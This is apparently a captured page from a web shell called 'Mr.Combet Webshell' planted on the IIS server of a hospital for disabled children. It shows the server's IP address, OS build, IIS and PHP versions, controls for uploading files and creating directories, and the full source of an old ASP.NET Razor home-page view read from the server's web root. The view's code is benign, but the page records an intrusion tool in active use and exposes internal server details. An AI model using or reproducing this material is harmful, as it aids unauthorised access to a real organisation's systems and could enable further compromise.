Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
HRDC
/
HRDC
/
Views
/
Home
/
_old
/
View File Name :
Index.cshtml
@model HRDC.Models.HomePageViewModel @{ ViewBag.Title = "HRDC-HOSPITAL & REHABILITATION for DISABLED CHILDREN"; Layout = "~/Views/Shared/HomeLayout.cshtml"; } <head> </head> <body> <header id="intro"> <div class="owl-carousel owl-banner owl-theme"> @foreach (var item in Model.lstBanner) { <div class="item image-block" style="background-image: url('/Assets/Images/MainBanner/@item.BannerImage');"> <div class="overlay-theme"></div> <div class="container"> <div class="centered-block animate-delay2" data-animation-in="fadeIn"> <h5 class="title-up white onload animate-delay2" data-animation-in="fadeInDown">@Html.Raw(item.BannerTitle)</h5> <p class="light white animate-delay2" data-animation-in="fadeInUp"> <b style="font-size:large"> @Html.Raw(item.BannerDescription) </b> </p> @Html.ActionLink("Read More", "BannerDetail/" + item.MainBannerID, "MainBanners", null, new { @class = "btn btn-white-fill ripple animate-delay2 fadeInUp" }) </div> </div> </div> } </div> </header> <section id="impacts" class="white-block"> <div class="cut cut-top"></div> <div class="container"> <div class="intro-tables top-margin"> <div class="row"> <div class="col-md-4"> <div class="intro-table intro-table-first"> <h5 class="title-up white heading" style="margin-left:40px">Children Stories</h5> <div class="owl-carousel owl-schedule bottom owl-theme"> @foreach (var item in Model.lstSuccessStories) { <div class="item image-block" style="background-image: url('/Assets/Images/SuccessStories/@item.SuccessStoryImage');"> <p class="white heading content">@item.SuccessStoryDescription</p> <div class="absolute-block"> @Html.ActionLink("more..", "SuccessStoriesDetail/" + item.SuccessStoryID, "SuccessStories", null, new { @class = "btn" })<small>|</small>@Html.ActionLink("view all", "SuccessStoriesList", "SuccessStories", null, new { @class = "btn btn-all" }) </div> <div class="overlay-theme"></div> </div> } </div> </div> </div> <div class="col-md-4"> @foreach (var item in Model.lstAwards) { <div class="intro-table intro-table-hover" style="background-image: url('/Assets/Images/Awards/@item.AwardImage');"> <h5 class="title-up white heading" style="margin-left:40px">Awards and Accolades</h5> <div class="bottom"> <p class="white heading small-pt" style="text-shadow:2px 2px #111111">@item.AwardDescription</p> @Html.ActionLink("More", "AwardDetail/" + item.AwardID, "Awards", null, new { @class = "btn btn-white-fill expand" }) </div> </div> } </div> <div class="col-md-4"> <div class="intro-table intro-table-third"> <h5 class="title-up white heading" style="margin-left:40px">Earthquake Responses</h5> <div class="owl-carousel owl-schedule3 bottom owl-theme"> @foreach (var item in Model.lstEarthquakeResponses) { <div class="item image-block" style="background-image: url('/Assets/Images/EarthquakeResponses/@item.ResponseImage');"> <p class="white heading content">@item.ResponseDescription</p> <div class="absolute-block"> @Html.ActionLink("more..", "EarthquakeResponseDetail/" + item.EarthquakeResponseID, "EarthquakeResponses", null, new { @class = "btn" })<small>|</small>@Html.ActionLink("view all", "EarthquakeResponseList", "EarthquakeResponses", null, new { @class = "btn btn-all" }) </div> <div class="overlay-theme"></div> </div> } </div> </div> </div> </div> </div> </div> </section> <section id="services" class="section-padded"> <div class="container"> <div class="row text-center title"> <h2 class="wow fadeInUp title-head"> HRDC PROGRAMS </h2> <h4 class="light muted wow fadeInUp"> Programs that we are involved with <a href="/OurPrograms/OurProgramList" class="btn btn-dark-blue wow fadeInLeft"><i class="fa fa-long-arrow-right"></i> view all</a> </h4> </div> <div class="row services"> <div class="col-sm-6 col-xs-12"> <div class="service wow fadeInLeft"> <div class="centered-block"> <div class="icon-holder"> <img src="~/img/icons/3.Field Based Services.png" alt="" class="icon"> </div> <h4 class="heading">@Model.lstOurPrograms.Where(t => t.ProgramID == 1).FirstOrDefault().ProgramTitle</h4> <p class="description">@Model.lstOurPrograms.Where(t => t.ProgramID == 1).FirstOrDefault().ProgramDescription</p> @Html.ActionLink("More", "OurProgramDetail/" + Model.lstOurPrograms.Where(t => t.ProgramID == 1).FirstOrDefault().ProgramID, "OurPrograms", null, null) </div> </div> </div> <div class="col-sm-6 col-xs-12"> <div class="service wow fadeInRight"> <div class="centered-block"> <div class="icon-holder"> <img src="~/img/icons/1.Hospital Based Services.png" alt="" class="icon"> </div> <h4 class="heading">@Model.lstOurPrograms.Where(t => t.ProgramID == 2).FirstOrDefault().ProgramTitle</h4> <p class="description">@Model.lstOurPrograms.Where(t => t.ProgramID == 2).FirstOrDefault().ProgramDescription</p> @Html.ActionLink("More", "OurProgramDetail/" + Model.lstOurPrograms.Where(t => t.ProgramID == 2).FirstOrDefault().ProgramID, "OurPrograms", null, null) </div> </div> </div> </div> </div> <div class="cut cut-bottom"></div> </section> <section id="team" class="section-padded gray-bg"> <div class="container"> <div class="row title text-center"> <h2 class="margin-top title-head wow fadeInUp">The HRDC Team</h2> <h4 class="light muted wow fadeInUp">About HRDC team!<a href="/Teams/TeamList" class="btn btn-dark-blue wow fadeInLeft"><i class="fa fa-long-arrow-right"></i> view all team</a></h4> </div> <div class="row"> <div class="col-sm-4 col-xs-12"> <div class="team text-center"> <div class="cover" style="background:url('/Assets/Images/Teams/@Model.lstTeams.Where(t=>t.TeamID==1).FirstOrDefault().TeamImage'); background-size:cover;"> <div class="overlay centered-block text-center"> <h5 class="light white">@Model.lstTeams.Where(t => t.TeamID == 1).FirstOrDefault().TeamDescription</h5> </div> </div> <img src="/img/team/team3.jpg" alt="Team Image" class="avatar wow fadeInRight"> <div class="title"> <h4>Dr. Ashok Kumar Banskota</h4> <h5 class="muted regular">@Model.lstTeams.Where(t => t.TeamID == 1).FirstOrDefault().TeamTitle</h5> </div> @Html.ActionLink("More", "TeamDetail/" + @Model.lstTeams.Where(t => t.TeamID == 1).FirstOrDefault().TeamID, "Teams", null, new { @class = "btn btn-blue-fill ripple" }) </div> </div> <div class="col-sm-4 col-xs-12"> <div class="team text-center"> <div class="cover" style="background:url('/Assets/Images/Teams/@Model.lstTeams.Where(t=>t.TeamID==2).FirstOrDefault().TeamImage'); background-size:cover;"> <div class="overlay centered-block text-center"> <h5 class="light white">Our composition, our team</h5> </div> </div> <img src="/img/team/team1.jpg" alt="Team Image" class="avatar wow flipInY"> <div class="title"> <h4>Organization Chart</h4> <h5 class="muted regular">@Model.lstTeams.Where(t => t.TeamID == 2).FirstOrDefault().TeamTitle</h5> </div> @Html.ActionLink("More", "TeamDetail/" + @Model.lstTeams.Where(t => t.TeamID == 2).FirstOrDefault().TeamID, "Teams", null, new { @class = "btn btn-blue-fill ripple" }) </div> </div> <div class="col-sm-4 col-xs-12"> <div class="team text-center"> <div class="cover" style="background:url('/Assets/Images/Teams/@Model.lstTeams.Where(t=>t.TeamID==3).FirstOrDefault().TeamImage'); background-size:cover;"> <div class="overlay centered-block text-center"> <h5 class="light white">our physiotherapists work to provide a holistic care.....</h5> </div> </div> <img src="/img/team/_team2.jpg" alt="Team Image" class="avatar wow fadeInLeft"> <div class="title"> <h4>HRDC Team</h4> <h5 class="muted regular">@Model.lstTeams.Where(t => t.TeamID == 3).FirstOrDefault().TeamTitle</h5> </div> @Html.ActionLink("More", "TeamDetail/" + @Model.lstTeams.Where(t => t.TeamID == 3).FirstOrDefault().TeamID, "Teams", null, new { @class = "btn btn-blue-fill ripple" }) </div> </div> </div> </div> </section> <section id="video-block" class="section-padded color-theme"> <div class="absolute-block"> <div class="has-circle"> </div> </div> <div class="container"> <div class="row title text-center"> <h2 class="margin-top title-head">HRDC</h2> <div class="box-shadow-wrapper top-margin wow fadeInUp"> <div class="video-section"> <img src="/img/video.jpg"> <div class="overlay overlay-theme"> <div class="centered-transform"> <div class="btn-play" id="btn-play" data-vidid="CN7Ugl81rmk"> <i class="fa fa-play"></i> </div> </div> </div> <div class="absolute-block"> <div class="embed-container"> <div id="ytvideo" style="display: none;"></div> </div> </div> <script type="text/javascript"> // Youtube Video on click $(document).on('click', '#btn-play', function (e) { $('.video-section .centered-transform').hide(); $('.video-section .absolute-block').css('background-color', 'rgba(0,0,0,0.9)'); $('#ytvideo').html('<iframe width="100%" height="100%" id="ytvideo" frameborder="0" allowfullscreen src="http://www.youtube.com/embed/' + $(this).attr("data-vidid") + '?&autoplay=1&loop=1"></iframe>').show(); }); </script> </div> </div> </div> <div class="top-margin text-center"> @Html.ActionLink("view all videos", "VideoList", "Videos", null, new { @class = "btn btn-white-fill wow flipInY animate-delay" }) </div> </div> </section> <section id="pricing" class="section-padded gallery"> <div class="container"> <div class="row title text-center"> <h2 class="margin-top title-head">Gallery</h2> <h6 class="light muted">List of HRDC Gallery Albums</h6> </div> <div class="row no-margin"> @foreach (var item in Model.lstGalleryAlbums) { <div class="col-sm-4 col-xs-12"> <div class="team text-center js-equal-height"> <div class="cover wow fadeInUp" style="background:url('/Assets/Images/Gallery/@item.AlbumImageURL'); background-size:cover;"> <div class="overlay centered-block text-center"> <h5 class="light white">@item.AlbumDescription</h5> @Html.ActionLink("More", "AlbumGallery/" + item.AlbumID, "Gallery", null, new { @class = "btn btn-white-fill ripple" }) </div> </div> </div> </div> } </div> <div class="top-margin text-center"> @Html.ActionLink("View All Gallery", "AlbumList", "Gallery", null, new { @class = "btn btn-blue-fill animate-delay wow flipInY" }) @*<a href="gallery.html" class=""><i class="fa fa-long-arrow-right"></i> View All Gallery</a>*@ </div> </div> </section> </body>